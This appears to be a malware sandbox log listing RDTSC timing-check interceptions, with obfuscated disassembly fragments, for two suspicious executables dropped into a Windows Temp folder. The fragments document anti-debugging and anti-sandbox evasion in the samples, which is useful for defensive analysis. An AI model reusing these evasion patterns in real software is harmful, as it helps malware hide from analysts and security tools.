Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0477 second address: 4EF0480 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0480 second address: 4EF048E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 lea eax, dword ptr [ebp-2Ch] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF048E second address: 4EF0495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0495 second address: 4EF04A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3838E06D1Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF04A4 second address: 4EF04A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF04A8 second address: 4EF04D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F3838E06D22h 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 mov cx, di 0x00000017 popad 0x00000018 push ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov esi, ebx 0x0000001e mov ch, dh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EE0D81 second address: 4EE0D85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EE0D85 second address: 4EE0D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EE0D8B second address: 4EE0DC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 pushfd 0x00000006 jmp 00007F3838D0CF54h 0x0000000b and cx, EC88h 0x00000010 jmp 00007F3838D0CF4Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EE0DC0 second address: 4EE0DDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF09E2 second address: 4EF0A1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 00687C27h 0x00000008 call 00007F3838D0CF4Ch 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebp, esp 0x00000013 jmp 00007F3838D0CF51h 0x00000018 cmp dword ptr [75AB459Ch], 05h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push edx 0x00000023 pop eax 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0A1C second address: 4EF0A23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0A23 second address: 4EF0A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007F38A986AF1Bh 0x0000000d jmp 00007F3838D0CF58h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F3838D0CF4Ah 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0A57 second address: 4EF0A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0A7E second address: 4EF0AD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007F3838D0CF49h 0x0000000f jmp 00007F3838D0CF4Dh 0x00000014 push eax 0x00000015 jmp 00007F3838D0CF51h 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e pushad 0x0000001f mov bl, 10h 0x00000021 mov cx, 8A7Fh 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 pushad 0x00000029 mov ax, dx 0x0000002c mov edi, 75033202h 0x00000031 popad 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 pushad 0x00000037 mov al, 03h 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0AD3 second address: 4EF0AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0AD7 second address: 4EF0B21 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3838D0CF57h 0x00000008 sub cl, FFFFFFAEh 0x0000000b jmp 00007F3838D0CF59h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F3838D0CF4Dh 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0B21 second address: 4EF0B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0B27 second address: 4EF0B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0B2B second address: 4EF0B5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007F38A996BD44h 0x00000010 push 75A52B70h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov eax, dword ptr [esp+10h] 0x00000020 mov dword ptr [esp+10h], ebp 0x00000024 lea ebp, dword ptr [esp+10h] 0x00000028 sub esp, eax 0x0000002a push ebx 0x0000002b push esi 0x0000002c push edi 0x0000002d mov eax, dword ptr [75AB4538h] 0x00000032 xor dword ptr [ebp-04h], eax 0x00000035 xor eax, ebp 0x00000037 push eax 0x00000038 mov dword ptr [ebp-18h], esp 0x0000003b push dword ptr [ebp-08h] 0x0000003e mov eax, dword ptr [ebp-04h] 0x00000041 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000048 mov dword ptr [ebp-08h], eax 0x0000004b lea eax, dword ptr [ebp-10h] 0x0000004e mov dword ptr fs:[00000000h], eax 0x00000054 ret 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F3838E06D20h 0x0000005e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0B5D second address: 4EF0B63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00AF9 second address: 4F00BB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, C4E4h 0x00000007 pushfd 0x00000008 jmp 00007F3838E06D1Dh 0x0000000d or ecx, 71032526h 0x00000013 jmp 00007F3838E06D21h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e push esi 0x0000001f pop eax 0x00000020 pushfd 0x00000021 jmp 00007F3838E06D1Fh 0x00000026 sub eax, 7154885Eh 0x0000002c jmp 00007F3838E06D29h 0x00000031 popfd 0x00000032 popad 0x00000033 push eax 0x00000034 pushad 0x00000035 jmp 00007F3838E06D27h 0x0000003a movzx eax, dx 0x0000003d popad 0x0000003e xchg eax, ebp 0x0000003f jmp 00007F3838E06D1Bh 0x00000044 mov ebp, esp 0x00000046 pushad 0x00000047 movzx eax, bx 0x0000004a jmp 00007F3838E06D21h 0x0000004f popad 0x00000050 xchg eax, esi 0x00000051 jmp 00007F3838E06D1Eh 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00BB5 second address: 4F00BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00BB9 second address: 4F00BD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00BD5 second address: 4F00C10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3838D0CF51h 0x00000009 sbb esi, 6E3C2D66h 0x0000000f jmp 00007F3838D0CF51h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov esi, 735B7B25h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00C10 second address: 4F00C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00C15 second address: 4F00C1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00C1A second address: 4F00C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F3838E06D1Dh 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov esi, dword ptr [ebp+0Ch] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00C38 second address: 4F00C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00C3C second address: 4F00C42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00C42 second address: 4F00C94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 72B73214h 0x00000008 push ebx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f pushad 0x00000010 mov esi, edi 0x00000012 pushfd 0x00000013 jmp 00007F3838D0CF51h 0x00000018 xor eax, 3D2B3986h 0x0000001e jmp 00007F3838D0CF51h 0x00000023 popfd 0x00000024 popad 0x00000025 je 00007F38A985A67Eh 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F3838D0CF4Dh 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00C94 second address: 4F00C99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00C99 second address: 4F00D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AB459Ch], 05h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F3838D0CF55h 0x00000017 or ah, 00000046h 0x0000001a jmp 00007F3838D0CF51h 0x0000001f popfd 0x00000020 mov ebx, ecx 0x00000022 popad 0x00000023 je 00007F38A9872705h 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F3838D0CF58h 0x00000030 xor ah, 00000018h 0x00000033 jmp 00007F3838D0CF4Bh 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007F3838D0CF58h 0x0000003f and ax, 4E78h 0x00000044 jmp 00007F3838D0CF4Bh 0x00000049 popfd 0x0000004a popad 0x0000004b xchg eax, esi 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007F3838D0CF50h 0x00000053 and ax, 68D8h 0x00000058 jmp 00007F3838D0CF4Bh 0x0000005d popfd 0x0000005e popad 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F3838D0CF54h 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00DF1 second address: 4F00DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00DF5 second address: 4F00E04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 4B2C6A second address: 4B2C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6338C3 second address: 6338CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F3838D0CF46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 633A7C second address: 633A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 633A87 second address: 633A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 633D6E second address: 633D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 633D72 second address: 633D8D instructions: 0x00000000 rdtsc 0x00000002 je 00007F3838D0CF46h 0x00000008 jmp 00007F3838D0CF51h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6372CD second address: 6372FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 push ebx 0x00000007 push esi 0x00000008 and edi, dword ptr [ebp+122D19F3h] 0x0000000e pop edx 0x0000000f pop ecx 0x00000010 push 00000000h 0x00000012 call 00007F3838E06D20h 0x00000017 pop edi 0x00000018 push A9475784h 0x0000001d push eax 0x0000001e push edx 0x0000001f jg 00007F3838E06D18h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6372FF second address: 637305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 637305 second address: 637309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 637417 second address: 6374B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jnl 00007F3838D0CF52h 0x00000010 mov dl, 7Ah 0x00000012 push 00000000h 0x00000014 mov ecx, dword ptr [ebp+122D1BE9h] 0x0000001a push 9BC746F5h 0x0000001f pushad 0x00000020 jmp 00007F3838D0CF53h 0x00000025 jns 00007F3838D0CF4Ch 0x0000002b popad 0x0000002c add dword ptr [esp], 6438B98Bh 0x00000033 clc 0x00000034 jmp 00007F3838D0CF57h 0x00000039 push 00000003h 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007F3838D0CF48h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 00000015h 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 cmc 0x00000056 movsx edi, cx 0x00000059 cld 0x0000005a push 00000000h 0x0000005c push 00000003h 0x0000005e mov cx, si 0x00000061 push 824BC61Bh 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6374B7 second address: 6374BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6374BB second address: 637513 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3838D0CF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edi 0x0000000e popad 0x0000000f add dword ptr [esp], 3DB439E5h 0x00000016 jmp 00007F3838D0CF57h 0x0000001b lea ebx, dword ptr [ebp+12458162h] 0x00000021 mov dword ptr [ebp+122D27DDh], edi 0x00000027 xchg eax, ebx 0x00000028 js 00007F3838D0CF54h 0x0000002e push eax 0x0000002f jnp 00007F3838D0CF50h 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 637577 second address: 637610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F3838E06D18h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov dl, B2h 0x00000027 push 00000000h 0x00000029 mov di, ax 0x0000002c pushad 0x0000002d mov dx, EDE9h 0x00000031 or edi, dword ptr [ebp+122D21FEh] 0x00000037 popad 0x00000038 push D1915EA1h 0x0000003d jmp 00007F3838E06D23h 0x00000042 add dword ptr [esp], 2E6EA1DFh 0x00000049 add dword ptr [ebp+122D2219h], eax 0x0000004f push 00000003h 0x00000051 mov edx, dword ptr [ebp+122D2BE8h] 0x00000057 push 00000000h 0x00000059 sub dword ptr [ebp+122D1B3Eh], ecx 0x0000005f push 00000003h 0x00000061 jmp 00007F3838E06D21h 0x00000066 push B1335483h 0x0000006b push eax 0x0000006c push edx 0x0000006d js 00007F3838E06D1Ch 0x00000073 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 637610 second address: 63763F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3838D0CF4Ch 0x00000008 jl 00007F3838D0CF46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xor dword ptr [esp], 71335483h 0x00000017 sbb edi, 6478596Ah 0x0000001d lea ebx, dword ptr [ebp+1245816Dh] 0x00000023 mov dx, 7339h 0x00000027 and dl, FFFFFFACh 0x0000002a push eax 0x0000002b pushad 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 656EF3 second address: 656F0C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F3838E06D23h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 656F0C second address: 656F11 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 654F4B second address: 654F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 654F4F second address: 654F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3838D0CF57h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 654F6A second address: 654F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 654F6E second address: 654F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6550B1 second address: 6550E1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3838E06D33h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F3838E06D1Eh 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6551CE second address: 6551D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6551D2 second address: 6551F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F3838E06D23h 0x0000000c jmp 00007F3838E06D1Bh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6551F4 second address: 6551F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6551F8 second address: 6551FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 6551FE second address: 655222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF4Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3838D0CF54h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 655222 second address: 655226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 655391 second address: 6553A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3838D0CF46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 655633 second address: 655637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 655A8A second address: 655A90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 655C3B second address: 655C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3838E06D1Ah 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	RDTSC instruction interceptor: First address: 655DF8 second address: 655E16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F3838D0CF46h 0x0000000a jmp 00007F3838D0CF54h 0x0000000f rdtsc
